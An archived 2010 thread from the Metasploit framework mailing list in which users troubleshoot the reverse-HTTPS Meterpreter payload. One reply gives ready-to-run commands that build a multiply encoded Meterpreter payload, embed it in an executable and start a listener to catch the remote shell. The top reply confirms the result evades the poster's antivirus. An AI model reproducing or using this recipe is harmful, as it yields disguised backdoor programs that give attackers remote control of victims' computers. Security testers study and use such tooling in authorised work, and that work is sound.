Re: windows/meterpreter/reverse_https still working

[wfdawson <wfdawson () bellsouth net>]

With the exception of "payload=shikata_ga_nai" mention on the msfcli line, I was 
happy to see that not only do the below steps avoid any detection by my AV, but 
it is also substantially faster to load than the equivalent multi-staged 
Meterpreter payload.

Thanks for the tip!




________________________________
From: Marc Doudiet <marc.doudiet () gmail com>
To: framework () spool metasploit com
Sent: Tue, November 16, 2010 3:54:20 PM
Subject: Re: [framework] windows/meterpreter/reverse_https still working

Hi,

I just used it today and it worked like a charm:

./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R | 
./msfencode -t exe -x test.exe -o test.exe -e x86/shikata_ga_nai -c 5

./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx 
lport=443 payload=windows/meterpreter/reverse_https E

hope this help.

M

On Nov 16, 2010, at 4:31 PM, Miguel Rios wrote:

I've also had issues lately with windows/meterpreter/reverse_https where it 
seems to start the connection and then hangs with no error messages. Regular old 
reverse_http works without a hitch and obviously 443 is allowed through the 
firewall so I think it may be a problem with meterpreter itself. I'd appreciate 
it if others could give feedback if they're seeing the same issues with latest 
svned up metasploit before I spend an afternoon testing it further.
> Thanks
>
> --- On Sat, 10/30/10, Jeffs <jeffs () speakeasy net> wrote:
>
>
> > From: Jeffs <jeffs () speakeasy net>
> > Subject: [framework] windows/meterpreter/reverse_https still working
> > To: "framework () spool metasploit com" <framework () spool metasploit com>
> > Date: Saturday,  October 30, 2010, 12:42 PM
> >
> >
> > Hello All,
> >
> > Does the windows/meterpreter/reverse_https still work in this day       and age? 
> > I am having difficulty getting it to connect back to a IE       7 instance using
> > the example here:
> > http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html
> >
> > I see through tcpdump that       the connection is being requested but nothing 
> > happens in the       exploit/multi/handler.
> >
> > Also, I cannot get the msfencode to work. Receive message no such       file or 
> > directory "msfencode" even though I see it in plain sight.
> >
> > Thank you.
> >
> >
> > -----Inline Attachment Follows-----
> >
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework